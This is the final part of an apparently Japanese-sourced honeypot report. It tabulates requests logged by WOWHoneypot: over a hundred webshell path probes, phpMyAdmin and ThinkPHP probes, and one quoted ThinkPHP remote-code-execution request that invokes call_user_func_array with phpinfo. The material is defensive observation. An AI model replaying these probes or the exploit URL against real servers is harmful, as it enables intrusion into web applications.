213. | WebShell probe | POST /zuos.php HTTP/1.1 | 1 | - | 0 | +1 |
214. | WebShell probe | POST /zuoss.php HTTP/1.1 | 1 | - | 0 | +1 |
215. | WebShell probe | POST /zuoshss.php HTTP/1.1 | 1 | - | 0 | +1 |
216. | WebShell probe | POST /boots.php HTTP/1.1 | 1 | - | 0 | +1 |
217. | WebShell probe | POST /she.php HTTP/1.1 | 1 | - | 0 | +1 |
218. | WebShell probe | POST /qw.php HTTP/1.1 | 1 | - | 0 | +1 |
219. | WebShell probe | POST /caonma.php HTTP/1.1 | 1 | - | 0 | +1 |
220. | WebShell probe | POST /wcp.php HTTP/1.1 | 1 | - | 0 | +1 |
221. | WebShell probe | POST /u.php HTTP/1.1 | 1 | - | 0 | +1 |
222. | WebShell probe | POST /uuu.php HTTP/1.1 | 1 | - | 0 | +1 |
223. | WebShell probe | POST /sss.php HTTP/1.1 | 1 | - | 0 | +1 |
224. | WebShell probe | POST /core.php HTTP/1.1 | 1 | - | 0 | +1 |
225. | WebShell probe | POST /qaz.php HTTP/1.1 | 1 | - | 0 | +1 |
226. | WebShell probe | POST /sha.php HTTP/1.1 | 1 | - | 0 | +1 |
227. | WebShell probe | POST /ppx.php HTTP/1.1 | 1 | - | 0 | +1 |
228. | WebShell probe | POST /conf1g.php HTTP/1.1 | 1 | - | 0 | +1 |
229. | WebShell probe | POST /ver.php HTTP/1.1 | 1 | - | 0 | +1 |
230. | WebShell probe | POST /hack.php HTTP/1.1 | 1 | - | 0 | +1 |
231. | WebShell probe | POST /qa.php HTTP/1.1 | 1 | - | 0 | +1 |
232. | WebShell probe | POST /Ss.php HTTP/1.1 | 1 | - | 0 | +1 |
233. | WebShell probe | POST /xxx.php HTTP/1.1 | 1 | - | 0 | +1 |
234. | WebShell probe | POST /92.php HTTP/1.1 | 1 | - | 0 | +1 |
235. | WebShell probe | POST /dexgp.php HTTP/1.1 | 1 | - | 0 | +1 |
236. | WebShell probe | POST /nuoxi.php HTTP/1.1 | 1 | - | 0 | +1 |
237. | WebShell probe | POST /godkey.php HTTP/1.1 | 1 | - | 0 | +1 |
238. | WebShell probe | POST /okokok.php HTTP/1.1 | 1 | - | 0 | +1 |
239. | WebShell probe | POST /erwa.php HTTP/1.1 | 1 | - | 0 | +1 |
240. | WebShell probe | POST /pma.php HTTP/1.1 | 1 | - | 0 | +1 |
241. | WebShell probe | POST /ruyi.php HTTP/1.1 | 1 | - | 0 | +1 |
242. | WebShell probe | POST /51314.php HTTP/1.1 | 1 | - | 0 | +1 |
243. | WebShell probe | POST /5201314.php HTTP/1.1 | 1 | - | 0 | +1 |
244. | WebShell probe | POST /fusheng.php HTTP/1.1 | 1 | - | 0 | +1 |
245. | WebShell probe | POST /general.php HTTP/1.1 | 1 | - | 0 | +1 |
246. | WebShell probe | POST /repeat.php HTTP/1.1 | 1 | - | 0 | +1 |
247. | WebShell probe | POST /ldw.php HTTP/1.1 | 1 | - | 0 | +1 |
248. | WebShell probe | POST /s1.php HTTP/1.1 | 1 | - | 0 | +1 |
249. | WebShell probe | POST /xiaodai.php HTTP/1.1 | 1 | - | 0 | +1 |
250. | WebShell probe | POST /admn.php HTTP/1.1 | 1 | - | 0 | +1 |
251. | WebShell probe | POST /hell.php HTTP/1.1 | 1 | - | 0 | +1 |
252. | WebShell probe | POST /xp.php HTTP/1.1 | 1 | - | 0 | +1 |
253. | WebShell probe | POST /p.php HTTP/1.1 | 1 | - | 0 | +1 |
254. | WebShell probe | POST /a.php HTTP/1.1 | 1 | - | 0 | +1 |
255. | WebShell probe | POST /m.php HTTP/1.1 | 1 | - | 0 | +1 |
256. | WebShell probe | POST /conf.php HTTP/1.1 | 1 | - | 0 | +1 |
257. | WebShell probe | POST /123.php HTTP/1.1 | 1 | - | 0 | +1 |
258. | WebShell probe | POST /HX.php HTTP/1.1 | 1 | - | 0 | +1 |
259. | WebShell probe | POST /666.php HTTP/1.1 | 1 | - | 0 | +1 |
260. | WebShell probe | POST /777.php HTTP/1.1 | 1 | - | 0 | +1 |
261. | WebShell probe | POST /qwq.php HTTP/1.1 | 1 | - | 0 | +1 |
262. | WebShell probe | POST /qwqw.php HTTP/1.1 | 1 | - | 0 | +1 |
263. | WebShell probe | POST /.php HTTP/1.1 | 1 | - | 0 | +1 |
264. | WebShell probe | POST /infos.php HTTP/1.1 | 1 | - | 0 | +1 |
265. | WebShell probe | POST /htfr.php HTTP/1.1 | 1 | - | 0 | +1 |
266. | WebShell probe | POST /zzk.php HTTP/1.1 | 1 | - | 0 | +1 |
267. | WebShell probe | POST /toor.php HTTP/1.1 | 1 | - | 0 | +1 |
268. | WebShell probe | POST /uu.php HTTP/1.1 | 1 | - | 0 | +1 |
269. | WebShell probe | POST /aa.php HTTP/1.1 | 1 | - | 0 | +1 |
270. | WebShell probe | POST /wb.php HTTP/1.1 | 1 | - | 0 | +1 |
271. | WebShell probe | POST /yj.php HTTP/1.1 | 1 | - | 0 | +1 |
272. | WebShell probe | POST /7.php HTTP/1.1 | 1 | - | 0 | +1 |
273. | WebShell probe | POST /xiaoma.php HTTP/1.1 | 1 | - | 0 | +1 |
274. | WebShell probe | POST /xiaomae.php HTTP/1.1 | 1 | - | 0 | +1 |
275. | WebShell probe | POST /xiaomar.php HTTP/1.1 | 1 | - | 0 | +1 |
276. | WebShell probe | POST /data.php HTTP/1.1 | 1 | - | 0 | +1 |
277. | WebShell probe | POST /log.php HTTP/1.1 | 1 | - | 0 | +1 |
278. | WebShell probe | POST /fack.php HTTP/1.1 | 1 | - | 0 | +1 |
279. | WebShell probe | POST /angge.php HTTP/1.1 | 1 | - | 0 | +1 |
280. | WebShell probe | POST /cxfm666.php HTTP/1.1 | 1 | - | 0 | +1 |
281. | WebShell probe | POST /db.php HTTP/1.1 | 1 | - | 0 | +1 |
282. | WebShell probe | POST /hacly.php HTTP/1.1 | 1 | - | 0 | +1 |
283. | WebShell probe | POST /xiaomo.php HTTP/1.1 | 1 | - | 0 | +1 |
284. | WebShell probe | POST /xiaoyu.php HTTP/1.1 | 1 | - | 0 | +1 |
285. | WebShell probe | POST /xiaohei.php HTTP/1.1 | 1 | - | 0 | +1 |
286. | WebShell probe | POST /j.php HTTP/1.1 | 1 | - | 0 | +1 |
287. | WebShell probe | POST /qq5262.php HTTP/1.1 | 1 | - | 0 | +1 |
288. | WebShell probe | POST /lost.php HTTP/1.1 | 1 | - | 0 | +1 |
289. | WebShell probe | POST /php.php HTTP/1.1 | 1 | - | 0 | +1 |
290. | WebShell probe | POST /win.php HTTP/1.1 | 1 | - | 0 | +1 |
291. | WebShell probe | POST /win1.php HTTP/1.1 | 1 | - | 0 | +1 |
292. | WebShell probe | POST /linux.php HTTP/1.1 | 1 | - | 0 | +1 |
293. | WebShell probe | POST /linux1.php HTTP/1.1 | 1 | - | 0 | +1 |
294. | WebShell probe | POST /cc.php HTTP/1.1 | 1 | - | 0 | +1 |
295. | WebShell probe | POST /lanke.php HTTP/1.1 | 1 | - | 0 | +1 |
296. | WebShell probe | POST /neko.php HTTP/1.1 | 1 | - | 0 | +1 |
297. | WebShell probe | POST /super.php HTTP/1.1 | 1 | - | 0 | +1 |
298. | WebShell probe | POST /cere.php HTTP/1.1 | 1 | - | 0 | +1 |
299. | WebShell probe | POST /aaa.php HTTP/1.1 | 1 | - | 0 | +1 |
300. | WebShell probe | POST /Administrator.php HTTP/1.1 | 1 | - | 0 | +1 |
301. | WebShell probe | POST /liangchen.php HTTP/1.1 | 1 | - | 0 | +1 |
302. | WebShell probe | POST /meng.php HTTP/1.1 | 1 | - | 0 | +1 |
303. | WebShell probe | POST /no.php HTTP/1.1 | 1 | - | 0 | +1 |
304. | WebShell probe | POST /mysql.php HTTP/1.1 | 1 | - | 0 | +1 |
305. | WebShell probe | POST /Updata.php HTTP/1.1 | 1 | - | 0 | +1 |
306. | WebShell probe | POST /xxxx.php HTTP/1.1 | 1 | - | 0 | +1 |
307. | WebShell probe | POST /coon.php HTTP/1.1 | 1 | - | 0 | +1 |
308. | WebShell probe | POST /zxc0.php HTTP/1.1 | 1 | - | 0 | +1 |
309. | WebShell probe | POST /zxc2.php HTTP/1.1 | 1 | - | 0 | +1 |
310. | WebShell probe | POST /indexa.php HTTP/1.1 | 1 | - | 0 | +1 |
311. | WebShell probe | POST /lx.php HTTP/1.1 | 1 | - | 0 | +1 |
312. | WebShell probe | POST /cn.php HTTP/1.1 | 1 | - | 0 | +1 |
313. | WebShell probe | POST /index1.php HTTP/1.1 | 1 | - | 0 | +1 |
314. | WebShell probe | POST /info.php HTTP/1.1 | 1 | - | 0 | +1 |
315. | WebShell probe | POST /info1.php HTTP/1.1 | 1 | - | 0 | +1 |
316. | WebShell probe | POST /aaaaaa1.php HTTP/1.1 | 1 | - | 0 | +1 |
317. | WebShell probe | POST /up.php HTTP/1.1 | 1 | - | 0 | +1 |
318. | WebShell probe | POST /fb.php HTTP/1.1 | 1 | - | 0 | +1 |
319. | WebShell probe | POST /cnm.php HTTP/1.1 | 1 | - | 0 | +1 |
320. | WebShell probe | POST /51.php HTTP/1.1 | 1 | - | 0 | +1 |
321. | WebShell probe | POST /cadre.php HTTP/1.1 | 1 | - | 0 | +1 |
322. | WebShell probe | POST /mm.php HTTP/1.1 | 1 | - | 0 | +1 |
323. | WebShell probe | POST /1q.php HTTP/1.1 | 1 | - | 0 | +1 |
324. | WebShell probe | POST /1111.php HTTP/1.1 | 1 | - | 0 | +1 |
325. | WebShell probe | POST /errors.php HTTP/1.1 | 1 | - | 0 | +1 |
326. | phpMyAdmin probe | GET /s/index.php HTTP/1.1 | 1 | - | 0 | +1 |
327. | phpMyAdmin probe | GET /phpMyAdmins/index.php HTTP/1.1 | 1 | - | 0 | +1 |
328. | phpMyAdmin probe | GET /mysql/sqlmanager/index.php HTTP/1.1 | 1 | - | 0 | +1 |
329. | ThinkPHP probe | GET /TP/public/index.php HTTP/1.1 | 1 | - | 0 | +1 |
330. | Attack exploiting the ThinkPHP vulnerability (reference) | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1 | 1 | - | 0 | +1 |
331. | Attack exploiting the ThinkPHP vulnerability (reference) | POST /TP/public/index.php?s=captcha HTTP/1.1 | 1 | - | 0 | +1 |
332. | Unknown | GET /825256118F24664C77F161AB6ADA62D7.php HTTP/1.1 | 1 | - | 0 | +1 |
That concludes the brief analysis of the logs collected by WOWHoneypot.